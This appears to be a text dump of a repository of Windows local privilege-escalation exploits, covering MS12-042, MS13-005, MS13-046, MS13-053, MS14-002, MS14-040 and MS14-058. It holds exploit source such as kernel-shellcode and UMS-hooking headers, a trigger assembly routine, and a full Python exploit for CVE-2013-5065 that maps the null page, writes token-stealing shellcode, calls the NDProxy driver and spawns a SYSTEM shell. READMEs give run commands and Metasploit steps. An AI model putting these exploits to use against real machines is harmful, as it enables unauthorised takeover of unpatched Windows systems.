            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmxon ");
            #endif
        }
        else {
            #ifndef BEA_LIGHT_DISASSEMBLY
                (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmptrld ");
            #endif
        }
        GV.EIP_ += GV.DECALAGE_EIP+2;

    }
    else if (GV.REGOPCODE == 7) {
        (*pMyDisasm).Instruction.Category = VM_INSTRUCTION;
        #ifndef BEA_LIGHT_DISASSEMBLY
            (void) strcpy ((*pMyDisasm).Instruction.Mnemonic, "vmptrst ");
        #endif
        GV.EIP_ += GV.DECALAGE_EIP+2;
    }
    else {
        FailDecode(pMyDisasm);
    }

}

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/beaengineSources/README.txt:
--------------------------------------------------------------------------------
; ========================================
;
;   BeaEngine 4
;
; ========================================

1) LICENSE
==========

This software is distributed under the LGPL license.
See the COPYING and COPYING.LESSER files for more details.


2) ONLINE DOCUMENTATION
=======================

For online documentation, visit :

http://www.beaengine.org


3) AUTHOR, CONTRIBUTORS, BETA-TESTERS
==========================================

BeatriX - Author (France) : beaengine (at) gmail.com
Igor Gutnik - Developer (ported the project on linux)

Contributors :

andrewl, bax, William Pomian, Ange Albertini, Pyrae, Vincent Roy, Kharneth, Eedy, Neitsa, KumaT, Rafal Cyran, 29a metal, sessiondiy, Tim, vince, Igor Gutnik, ouadji, Helle, Baboon, pop9080, ktion23.

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sources/include/beaengine/macros.h:
--------------------------------------------------------------------------------
#ifndef __BEAENGINE_MACROS_H__
#define __BEAENGINE_MACROS_H__
/*
============================================================================
Compiler Silencing macros

Some compilers complain about parameters that are not used.  This macro
should keep them quiet.
============================================================================
*/

# if defined (__GNUC__) && ((__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 2)))
#   define BEA_UNUSED_ARG(a) (void) (a)
#elif defined (ghs) || defined (__GNUC__) || defined (__hpux) || defined (__sgi) || defined (__DECCXX) || defined (__rational__) || defined (__USLC__) || defined (BEA__RM544) || defined (__DCC__) || defined (__PGI) || defined (__TANDEM) || defined(__BORLANDC__)
    /*
    Some compilers complain about "statement with no effect" with (a).
    This eliminates the warnings, and no code is generated for the null
    conditional statement.  Note, that may only be true if -O is enabled,
    such as with GreenHills (ghs) 1.8.8.
    */

#   define BEA_UNUSED_ARG(a) do {/* null */} while (&a == 0)
#elif defined (__DMC__)
 #if defined(__cplusplus)
 #define BEA_UNUSED_ID(identifier)
 template <class T>
 inline void BEA_UNUSED_ARG(const T& BEA_UNUSED_ID(t)) { }
 #else
  #define BEA_UNUSED_ARG(a)
 #endif
#else /* ghs || __GNUC__ || ..... */
#  define BEA_UNUSED_ARG(a) (a)
#endif /* ghs || __GNUC__ || ..... */

#if defined (_MSC_VER) || defined(__sgi) || defined (ghs) || defined (__DECCXX) || defined(__BORLANDC__) || defined (BEA_RM544) || defined (__USLC__) || defined (__DCC__) || defined (__PGI) || defined (__TANDEM) || (defined (__HP_aCC) && (__HP_aCC >= 60500))
# define BEA_NOTREACHED(a)
#else /* __sgi || ghs || ..... */
# define BEA_NOTREACHED(a) a
#endif /* __sgi || ghs || .....
 */

#endif /* __BEAENGINE_MACROS_H__ */

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/stdafx.cpp:
--------------------------------------------------------------------------------
// stdafx.cpp : source file that includes just the standard includes
// junk.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/stdafx.h:
--------------------------------------------------------------------------------
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//

#pragma once

#include "targetver.h"

// Header names were lost in extraction; these are the two the Visual Studio
// console-application template places here.
#include <stdio.h>
#include <tchar.h>



// TODO: reference additional headers your program requires here

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/sysret.h:
--------------------------------------------------------------------------------
// The three system header names were lost in extraction. windows.h and psapi.h
// follow from the psapi.lib pragma and the Windows types used below; stdio.h is assumed.
#include <windows.h>
#include <psapi.h>
#include <stdio.h>
#pragma comment(lib,"psapi.lib")
#pragma once

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef
NTSTATUS
(NTAPI *NtAllocateVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __in ULONG_PTR ZeroBits,
    __inout PSIZE_T RegionSize,
    __in ULONG AllocationType,
    __in ULONG Protect
    );

BOOL
AlocNullPageAndFixCondtions(
    VOID
    );

BOOL
SetupKernelShellcode(
    IN ULONG_PTR UsermodeReturnAddress,
    IN ULONG_PTR ProcessId
    );

BOOL
GetDriverImageBase(
    OUT PULONG_PTR DriverBase,
    IN PCHAR DriverName
    );

ULONG_PTR
KernelGetProcAddress(
    IN ULONG_PTR UserKernelBase,
    IN ULONG_PTR RealKernelBase,
    IN LPCSTR SymName
    );

BOOL
GetKernelBaseInfo(
    OUT PULONG_PTR kernelBase,
    IN OUT PCHAR kernelImage,
    IN UINT Size
    );

ULONG_PTR
GetCiEnabledAddress(
    IN HMODULE hModule
    );

ULONG_PTR
SpawnProcess(
    IN PCHAR szProcess
    );

ULONG_PTR
GetUmsSchedulerAddress(
    VOID
    );

BOOL
HookUmsScheduler(
    VOID
    );

extern "C"
VOID
SetNonCanonicalAddress(
    VOID
    );
--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/targetver.h:
--------------------------------------------------------------------------------
#pragma once

// Including SDKDDKVer.h defines the highest available Windows platform.

// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.

#include <SDKDDKVer.h>

--------------------------------------------------------------------------------
/MS12-042/sysret-source/junk/trigger.asm:
--------------------------------------------------------------------------------
EXTERN OrginalUmsSchedulerAddress :QWORD

.CODE
SetNonCanonicalAddress PROC FRAME
    mov r11, 8000000000000000h
    jmp [OrginalUmsSchedulerAddress]
.ENDPROLOG
    ret
SetNonCanonicalAddress ENDP
END

--------------------------------------------------------------------------------
/MS12-042/sysret-source/sysret.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "junk", "junk\junk.vcxproj", "{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Win32 = Debug|Win32
		Debug|x64 = Debug|x64
		Release|Win32 = Release|Win32
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|Win32.ActiveCfg = Debug|Win32
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|Win32.Build.0 = Debug|Win32
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|x64.ActiveCfg = Debug|x64
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Debug|x64.Build.0 = Debug|x64
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|Win32.ActiveCfg = Release|Win32
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|Win32.Build.0 = Release|Win32
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|x64.ActiveCfg = Release|x64
		{33A91BC5-C798-4CA3-BDE2-ED317FCBCD7F}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/MS12-042/sysret-source/sysret.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/sysret.suo
--------------------------------------------------------------------------------
/MS12-042/sysret-source/x64/Release/MinHook.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/x64/Release/MinHook.x64.dll
--------------------------------------------------------------------------------
/MS12-042/sysret-source/x64/Release/sysret.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/x64/Release/sysret.exe
--------------------------------------------------------------------------------
/MS12-042/win7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/win7.png
--------------------------------------------------------------------------------
/MS13-005/README.md:
--------------------------------------------------------------------------------
# MS13-005

```
Due to a problem with isolating window broadcast messages in the Windows kernel,
an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process,
thereby effecting a privilege escalation.
This issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and RT.
Note that spawning a command prompt with the shortcut key combination Win+Shift+# does not work in Vista,
so the attacker will have to check if the user is already running a command prompt and set SPAWN_PROMPT false.
Three exploit techniques are available with this module.
The WEB technique will execute a powershell encoded payload from a Web location.
The FILE technique will drop an executable to the file system,
set it to medium integrity and execute it.
The TYPE technique will attempt to execute a powershell encoded payload directly from the command line,
but may take some time to complete.
```
- The exploit is from [@0vercl0k](https://github.com/0vercl0k/stuffz/blob/master/ms13-005-funz-poc.cpp)

Vulnerability reference:
* [MS13-005](https://technet.microsoft.com/library/security/ms13-005)
* [CVE-2013-0008](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0008)


## Load the module within Metasploit
- [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_005_hwnd_broadcast)
```
msf > use exploit/windows/local/ms13_005_hwnd_broadcast
msf exploit(ms13_005_hwnd_broadcast) > show targets
    ...targets...
msf exploit(ms13_005_hwnd_broadcast) > set TARGET <target-id>
msf exploit(ms13_005_hwnd_broadcast) > show options
    ...show and set options...
msf exploit(ms13_005_hwnd_broadcast) > exploit
```

## Links

- [HWND_BROADCAST](http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html)
--------------------------------------------------------------------------------
/MS13-046/2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/2003.png
--------------------------------------------------------------------------------
/MS13-046/MS13-046-KB2829361/epathobj_exp32(MS13-046).exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/MS13-046-KB2829361/epathobj_exp32(MS13-046).exe
--------------------------------------------------------------------------------
/MS13-046/MS13-046-KB2829361/epathobj_exp64(MS13-046).exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/MS13-046-KB2829361/epathobj_exp64(MS13-046).exe
--------------------------------------------------------------------------------
/MS13-046/README.md:
--------------------------------------------------------------------------------
# MS13-046
```
dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2,
Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory,
which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability."
6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS13-046](https://technet.microsoft.com/library/security/ms13-046) 10 | * [CVE-2013-1332](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1332) 11 | 12 | 13 | ## Usage 14 | ``` 15 | c:\> epathobj_exp32(MS13-046).exe cmd 16 | ``` 17 | ![2003](2003.png) 18 | ![win7](win7_local.png) 19 | 20 | ## References 21 | * [打破MS13-046不能webshell执行问题](http://www.91ri.org/6708.html) -------------------------------------------------------------------------------- /MS13-046/win7_local.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-046/win7_local.png -------------------------------------------------------------------------------- /MS13-053/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-053/2003.png -------------------------------------------------------------------------------- /MS13-053/MS13-053-KB2850851.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS13-053/MS13-053-KB2850851.zip -------------------------------------------------------------------------------- /MS13-053/README.md: -------------------------------------------------------------------------------- 1 | # MS13-053 2 | ``` 3 | win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, 4 | Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, 5 | which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." 
```

Vulnerability reference:
* [MS13-053](https://technet.microsoft.com/library/security/ms13-053)
* [CVE-2013-1300](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1300)
* [CVE-2013-1340](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1340)
* [CVE-2013-1345](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1345)
* [CVE-2013-3129](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3129)
* [CVE-2013-3167](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3167)
* [CVE-2013-3172](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3172)
* [CVE-2013-3173](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3173)
* [CVE-2013-3660](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3660)

## Usage
```
c:\> MS13-053.exe
```
![2003](2003.png)

## Loading the module within Metasploit
[msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms13_053_schlamperei)
```
msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > show targets
...targets...
msf exploit(ms13_053_schlamperei) > set TARGET
msf exploit(ms13_053_schlamperei) > show options
...show and set options...
msf exploit(ms13_053_schlamperei) > exploit
```

## References
* [Adobe, Microsoft Release Critical Updates](https://krebsonsecurity.com/tag/ms13-053/)
* [ms13_053_schlamperei.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_053_schlamperei.rb)

--------------------------------------------------------------------------------
/MS14-002/CVE-2013-5065.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/CVE-2013-5065.exe
--------------------------------------------------------------------------------
/MS14-002/CVE-2013-5065.py:
--------------------------------------------------------------------------------
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/


# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
10 | 11 | from ctypes import * 12 | from ctypes.wintypes import * 13 | import os, sys 14 | 15 | kernel32 = windll.kernel32 16 | ntdll = windll.ntdll 17 | 18 | GENERIC_READ = 0x80000000 19 | GENERIC_WRITE = 0x40000000 20 | FILE_SHARE_READ = 0x00000001 21 | FILE_SHARE_WRITE = 0x00000002 22 | NULL = 0x0 23 | OPEN_EXISTING = 0x3 24 | PROCESS_VM_WRITE = 0x0020 25 | PROCESS_VM_READ = 0x0010 26 | MEM_COMMIT = 0x00001000 27 | MEM_RESERVE = 0x00002000 28 | MEM_FREE = 0x00010000 29 | PAGE_EXECUTE_READWRITE = 0x00000040 30 | PROCESS_ALL_ACCESS = 2097151 31 | FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 32 | baseadd = c_int(0x00000001) 33 | MEMRES = (0x1000 | 0x2000) 34 | MEM_DECOMMIT = 0x4000 35 | PAGEEXE = 0x00000040 36 | null_size = c_int(0x1000) 37 | STATUS_SUCCESS = 0 38 | 39 | def log(msg): 40 | print msg 41 | 42 | def getLastError(): 43 | """[-] Format GetLastError""" 44 | buf = create_string_buffer(2048) 45 | if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, 46 | kernel32.GetLastError(), 0, 47 | buf, sizeof(buf), NULL): 48 | log(buf.value) 49 | else: 50 | log("[-] Unknown Error") 51 | 52 | print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" 53 | print "[*] Vulnerability found in the wild" 54 | print "[*] Coded by Offensive Security" 55 | 56 | tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) 57 | InBuf = c_char_p(tmp) 58 | 59 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) 60 | if dwStatus != STATUS_SUCCESS: 61 | print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus 62 | getLastError() 63 | written = c_ulong() 64 | sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" 65 | sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) 66 | alloc = 
kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) 67 | if alloc == 0: 68 | print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc 69 | getLastError() 70 | 71 | dwRetBytes = DWORD(0) 72 | DEVICE_NAME = "\\\\.\\NDProxy" 73 | hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) 74 | if hdev == -1: 75 | print "[-] Couldn't open the device... :(" 76 | sys.exit() 77 | kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) 78 | kernel32.CloseHandle(hdev) 79 | print "[+] Spawning SYSTEM Shell..." 80 | os.system("start /d \"C:\\windows\\system32\" cmd.exe") -------------------------------------------------------------------------------- /MS14-002/MS14-002.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/MS14-002.exe -------------------------------------------------------------------------------- /MS14-002/README.md: -------------------------------------------------------------------------------- 1 | # MS14-002 2 | 3 | ``` 4 | This module exploits a flaw in the ndproxy. 5 | sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. 6 | The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, 7 | where user provided input is used to access an array unsafely, and the value is used to perform a call, 8 | leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. 9 | This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. 10 | In order to work the service "Routing and Remote Access" must be running on the target system. 
```
- The exp was from [@dev-zzo](https://github.com/dev-zzo/exploits-nt-privesc/blob/master/MS14-002/MS14-002.c), [@Tomislav Paskalev](https://www.exploit-db.com/exploits/37732/) and [@ryujin](https://www.exploit-db.com/exploits/30014/)

Vulnerability reference:
* [MS14-002](https://technet.microsoft.com/library/security/ms14-002)
* [CVE-2013-5065](https://www.exploit-db.com/exploits/39446/)


## Usage
- c:\> MS14-002.exe XP
- c:\> MS14-002.exe 2k3

![win2003](win2003.png)

## Loading the module within msf
- [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms_ndproxy)

```
msf > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show targets
...targets...
msf exploit(ms_ndproxy) > set TARGET
msf exploit(ms_ndproxy) > show options
...show and set options...
msf exploit(ms_ndproxy) > exploit

```
## Links

- [The Kernel is calling a zero(day) pointer – CVE-2013-5065 – Ring Ring](https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Kernel-is-calling-a-zero(day)-pointer-–-CVE-2013-5065-–-Ring-Ring/)
- [CVE-2013-5065: NDProxy array indexing error unpatched vulnerability](https://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/)

--------------------------------------------------------------------------------
/MS14-002/win2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-002/win2003.png
--------------------------------------------------------------------------------
/MS14-040/MS14-040-x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-040/MS14-040-x64.exe
--------------------------------------------------------------------------------
/MS14-040/MS14-40-x86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-040/MS14-40-x86.exe
--------------------------------------------------------------------------------
/MS14-040/README.md:
--------------------------------------------------------------------------------
# MS14-040

- The poc was from [@JeremyFetiveau](https://github.com/JeremyFetiveau/Exploits/blob/master/MS14-040.cpp)

Vulnerability reference:
* [MS14-040](https://technet.microsoft.com/library/security/ms14-040)
* [CVE-2014-1767](https://www.exploit-db.com/exploits/39446/)


## Links

- [AFD.sys Dangling Pointer Advisory](http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf)
- [CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit](http://www.secniu.com/englishversioncve-2014-1767-afd-sys-double-free-vulnerability-analysis-and-exploit/)

--------------------------------------------------------------------------------
/MS14-058/2008.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/2008.png
--------------------------------------------------------------------------------
/MS14-058/CVE-2014-4113-Exploit.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/CVE-2014-4113-Exploit.rar
--------------------------------------------------------------------------------
/MS14-058/Exploit/.vs/Exploit/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/.vs/Exploit/v14/.suo -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.VC.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit.VC.db -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2013 for Windows Desktop 4 | VisualStudioVersion = 12.0.31101.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Exploit", "Exploit\Exploit.vcxproj", "{47475E7C-FF81-4FAA-897B-3517562A2141}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Debug|Win32.Build.0 = Debug|Win32 16 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Release|Win32.ActiveCfg = Release|Win32 17 | {47475E7C-FF81-4FAA-897B-3517562A2141}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit.v12.suo: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit.v12.suo -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Exploit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : Exploit Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Exploit application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your Exploit application. 9 | 10 | 11 | Exploit.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | Exploit.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. 
This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | Exploit.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named Exploit.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.log: -------------------------------------------------------------------------------- 1 |  stdafx.cpp 2 | Exploit.cpp 3 | 正在生成代码 4 | All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 
5 | 已完成代码的生成 6 | Exploit.vcxproj -> C:\Users\Hx\Desktop\39666\39666\Exploit\Release\Exploit.exe 7 | Exploit.vcxproj -> C:\Users\Hx\Desktop\39666\39666\Exploit\Release\Exploit.pdb (Full PDB) 8 | -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.obj -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.pch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.pch -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /MS14-058/Exploit/Exploit/Release/Exploit.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- 
